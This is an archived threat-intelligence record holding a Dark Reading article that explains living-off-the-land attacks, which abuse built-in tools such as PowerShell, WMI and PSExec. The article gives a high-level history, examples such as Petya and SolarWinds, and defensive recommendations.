{
	"id": "47c909be-f369-4100-b1e5-5ad70ad746b8",
	"created_at": "2026-04-06T00:06:32.899207Z",
	"updated_at": "2026-04-10T03:33:30.022104Z",
	"deleted_at": null,
	"sha1_hash": "79aa6a61e2e0c362e03c102eead11e6e8f4b989f",
	"title": "Is an Attacker Living Off Your Land?",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 528553,
	"plain_text": "Is an Attacker Living Off Your Land?\r\nBy Samuel Greengard\r\nPublished: 2021-06-16 · Archived: 2026-04-05 19:00:17 UTC\r\n(Image: Riverwalker via Adobe Stock)\r\nMalware – and all of its various forms, including ransomware – has grown increasingly stealthy and sophisticated\r\nin recent years. Also on the rise: Its ability to fly under cybersecurity software's radar.\r\nOne of the primary reasons detecting and stamping out malware is so difficult is the rise of an attack method\r\ncalled living off the land (LotL). Despite conjuring up idyllic images of urban farming or sustainability, the term\r\nrefers to a group of techniques that typically execute in shell code or scripts running in memory.\r\nAttackers who \"live off the land\" make use of a system's own tools and utilities to conduct malicious activity. With\r\nthese attacks, which don't use easily detectable malicious files, an attacker can lurk within a computer or network\r\nand avoid discovery by security tools.\r\nEven if an attack is discovered, the binaries used are exceptionally difficult to eradicate. As a result, a LotL attack\r\nis particularly risky for victims.\r\nLiving Off the Land: A Brief History\r\nThe concept of using fileless malware, or malware that relies on legitimate programs to attack, first appeared\r\naround the start of the current century. Early examples of this approach include malware with names like Frodo,\r\nCode Red, and SQL Slammer Worm. However, these payloads were more of a nuisance than a real threat. Then, in\r\n2012, a banking Trojan named Lurk appeared. Although it wasn't terribly sophisticated, it demonstrated LotL's\r\npotential.\r\nIn 2013, security researchers Christopher Campbell and Matt Greaber coined the LotL term to describe malware\r\nthat hides within a system and exploits legitimate tools and utilities to cause damage. Over the past few years, the\r\nhttps://www.darkreading.com/edge-articles/is-an-attacker-living-off-your-land-Page 1 of 3\n\nscope and sophistication of these attacks has grown. In fact, as security firms have become better at identifying\r\nand blacklisting malicious files, fileless attacks have moved into the mainstream.\r\nHow Does Living Off the Land Work?\r\nIn a LotL attack, adversaries take advantage of legitimate tools and utilities within a system. This might include\r\nPowerShell scripts, Visual Basic scripts, WMI, PSExec, and Mimikatz. The attack exploits the functionality of the\r\nsystem and hijacks it for nefarious purposes. It may include tactics like DLL hijacking, hiding payloads, process\r\ndumping, downloading files, bypassing UAC keylogging, code compiling, log evasion, code execution, and\r\npersistence.\r\nCybercriminals use different methods and unleash different types of malware that fall into the general category of\r\nLotL. In many cases, they tap tools such as Poshspy, Powruner, and Astaroth that take advantage of LOLBins and\r\nfileless techniques to evade detection. Most attacks involve Windows binaries that mask malicious activities;\r\nhowever, LotL attacks can also affect macOS, Linux, Android, and cloud services.\r\nThe reason this approach works so well is because resources such as PowerShell and Windows Scripting Host\r\n(WScript.exe) offer capabilities that far exceed the needs of most organizations—and many of these features aren’t\r\nswitched off or removed when they’re not required by an organization. Overall, more than 100 Windows binary\r\ntools represent a serious risk, according to GitHub.\r\nWhat Do LotL Attacks Look Like?\r\nOnce attackers have invaded legitimate tools, such as PowerShell, they're able to tap other legitimate processes\r\nand code, including built-in scripting languages such as Perl, Python, and C++.\r\nFor example, an attacker might create a script that includes a list of targeted machines and, together with a PSExec\r\naccount with executive privileges, copy and execute malware into peer machines. Another possible method of\r\nattack is leveraging a logon and logoff script via a Group Policy Object (GPO) or abusing the Windows\r\nManagement Interface (WMI) to mass-distribute ransomware inside the network.\r\nA similar approach uses malware to inject malicious code into a trusted running process like SVCHOST.EXE or\r\nuse the Windows RUNDLL32.EXE application. This makes it possible to encrypt documents from a trusted\r\nprocess, cybersecurity firm Sophos reports. This tactic can evade some anti-ransomware programs that do not\r\nmonitor or are configured to ignore encryption activity by default Windows applications.\r\nRansomware may also run from a NTFS Alternate Data Stream (ADS) to hide from both victim users and\r\nendpoint protection software, cybersecurity firm Malwarebytes Labs points out. Oftentimes, the entire attack takes\r\nplace within a few hours or during the night when staff pay less attention to IT systems. Once the malware has\r\nencrypted files, the recipient winds up with a locked screen and a ransom note.\r\nThese attacks often appear to come out of nowhere because the actual file encryption is performed within a trusted\r\nPowershell.exe component. As a result, endpoint protection software may not detect the process because it appears\r\nto be legitimate, according to Sophos.\r\nOne of the most widely publicized LotL attacks occurred in 2017, when so-called Petya malware appeared. It\r\ninitially infected a software accounting program in the Ukraine and then spread across companies. More recently,\r\nhttps://www.darkreading.com/edge-articles/is-an-attacker-living-off-your-land-Page 2 of 3\n\nthe SolarWinds attack, a.k.a. SUNBURST, used LotL and other methods to plant malware in one of the security\r\nfirm’s software patches.\r\nReducing Risk Is Critical\r\nThere's no simple way to avoid the risk of an LotL attack. It's also difficult to determine who is initiating the\r\nattack because of the stealthy nature of the malware.\r\nIn general, the best defense is to ensure that unneeded components are switched off or removed from systems.\r\nOther strategies include setting up application whitelisting where possible, tapping behavioral analytics software,\r\npatching and updating components regularly, using multifactor authentication, and continuing to educate users\r\nabout the risks associated with clicking email links and opening attachments.\r\nAbout the Author\r\nFreelance Writer\r\nSamuel Greengard writes about business, technology, and cybersecurity for numerous magazines and websites. He\r\nis author of the books \"The Internet of Things\" and \"Virtual Reality\" (MIT Press).\r\nSource: https://www.darkreading.com/edge-articles/is-an-attacker-living-off-your-land-https://www.darkreading.com/edge-articles/is-an-attacker-living-off-your-land-Page 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.darkreading.com/edge-articles/is-an-attacker-living-off-your-land-"
	],
	"report_names": [
		"is-an-attacker-living-off-your-land-"
	],
	"threat_actors": [
		{
			"id": "dcba8e2b-93e0-4d6e-a15f-5c44faebc3b1",
			"created_at": "2022-10-25T16:07:23.816991Z",
			"updated_at": "2026-04-10T02:00:04.758143Z",
			"deleted_at": null,
			"main_name": "Lurk",
			"aliases": [],
			"source_name": "ETDA:Lurk",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775433992,
	"ts_updated_at": 1775792010,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/79aa6a61e2e0c362e03c102eead11e6e8f4b989f.pdf",
		"text": "https://archive.orkl.eu/79aa6a61e2e0c362e03c102eead11e6e8f4b989f.txt",
		"img": "https://archive.orkl.eu/79aa6a61e2e0c362e03c102eead11e6e8f4b989f.jpg"
	}
}